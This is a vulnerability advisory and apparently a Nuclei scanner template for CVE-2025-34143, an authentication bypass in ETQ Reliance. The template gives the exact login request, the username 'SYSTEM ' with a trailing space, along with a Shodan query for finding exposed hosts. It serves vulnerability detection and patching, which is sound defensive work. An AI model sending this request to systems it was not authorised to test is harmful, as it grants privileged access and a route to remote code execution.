An authentication bypass vulnerability exists in ETQ Reliance on the CG (legacy) platform. The application allowed login as the privileged internal SYSTEM user by manipulating the username field. The SYSTEM account does not require a password, enabling attackers with network access to the login page to obtain elevated access. Once authenticated, an attacker could achieve remote code execution by modifying Jython scripts within the application. This issue was resolved by introducing stricter validation logic to exclude internal accounts from public authentication workflows in version MP-4583.
PoC代码[已公开]
id: CVE-2025-34143
info:
name: ETQ Reliance - Authentication Bypass via Trailing Space
author: slcyber,DhiyaneshDK
severity: critical
description: |
An authentication bypass vulnerability exists in ETQ Reliance on the CG (legacy) platform. The application allowed login as the privileged internal SYSTEM user by manipulating the username field. The SYSTEM account does not require a password, enabling attackers with network access to the login page to obtain elevated access. Once authenticated, an attacker could achieve remote code execution by modifying Jython scripts within the application. This issue was resolved by introducing stricter validation logic to exclude internal accounts from public authentication workflows in version MP-4583.
impact: |
Successful exploitation allows unauthenticated attackers to bypass authentication and gain elevated SYSTEM access, potentially leading to remote code execution.
remediation: |
Apply the vendor patch to version MP-4583 or later, which includes stricter validation logic to exclude internal accounts from public authentication workflows.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-34143
- https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
classification:
epss-score: 0.04443
epss-percentile: 0.88624
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-34143
cwe-id: CWE-287
metadata:
verified: true
max-request: 1
shodan-query: html:"ETQ Reliance"
tags: cve,cve2025,etq-reliance,auth-bypass,vkev
variables:
username: "SYSTEM "
password: "{{to_lower(rand_text_alphanumeric(7))}}"
http:
- raw:
- |
POST /reliance/resources/sessions HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: application/json
{"username":"{{username}}","password":"{{password}}"}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "statusCode"
- "userId"
condition: and
- type: word
part: content_type
words:
- "application/json"
# digest: 4a0a0047304502210090854da02386b0ffb67a7eb92660097575a33bc84114c11c4a3d4797226ef6170220203d6a2160a51a23427200d3fe5675709759dcbc69a3028304fe7ad93f474e89:922c64590222798bb761d5b6d8e72950